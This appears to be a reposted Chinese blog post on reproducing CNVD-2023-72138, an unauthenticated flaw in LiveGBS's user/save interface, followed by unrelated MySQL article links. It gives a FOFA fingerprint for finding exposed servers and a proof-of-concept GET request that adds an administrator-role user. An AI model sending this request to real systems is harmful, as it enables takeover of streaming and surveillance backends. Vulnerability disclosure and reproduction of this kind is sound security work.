博客
关于我
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)
阅读量:794 次
发布时间:2023-02-06

本文共 585 字,大约阅读时间需要 1 分钟。

LiveGBS是一款由安徽青柿信息科技有限公司开发的国标(GB28181)流媒体服务软件,主要功能包括用户管理、Web可视化页面管理以及开源的前端页面源码提供,同时还支持设备状态管理,可实时监控设备是否正常运行。

在技术细节方面,该软件的user/save接口存在严重的逻辑漏洞。攻击者无需进行身份验证即可利用此漏洞,通过传递特定参数(如ID、Username、Role等),可以执行用户信息的任意添加操作。这种漏洞一旦被利用,会导致后台服务被接管,造成信息泄露等安全风险。

该漏洞主要影响LiveGBS版本号≤3.2.x的产品,已知攻击可能对系统造成严重后果。为了帮助开发团队快速定位问题,我们提供了以下复现环境信息:

FOFA hash: -206100324

至于漏洞的具体复现方法,我们提供了以下PoC示例:

GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,

通过上述方法,可以有效复现漏洞现象。建议开发者及时修复该漏洞,以确保系统安全性。

转载地址:http://tuufk.baihongyu.com/

你可能感兴趣的文章
MySQL 索引深入解析及优化策略
查看>>
MySQL 索引的面试题总结
查看>>
mysql 索引类型以及创建
查看>>
MySQL 索引连环问题,你能答对几个?
查看>>
Mysql 索引问题集锦
查看>>
Mysql 纵表转换为横表
查看>>
mysql 编译安装 window篇
查看>>
mysql 网络目录_联机目录数据库
查看>>
MySQL 聚簇索引&&二级索引&&辅助索引
查看>>
Mysql 脏页 脏读 脏数据
查看>>
mysql 自增id和UUID做主键性能分析,及最优方案
查看>>
Mysql 自定义函数
查看>>
mysql 行转列 列转行
查看>>
Mysql 表分区
查看>>
mysql 表的操作
查看>>
mysql 视图,视图更新删除
查看>>
MySQL 触发器
查看>>
mysql 让所有IP访问数据库
查看>>
mysql 记录的增删改查
查看>>
MySQL 设置数据库的隔离级别
查看>>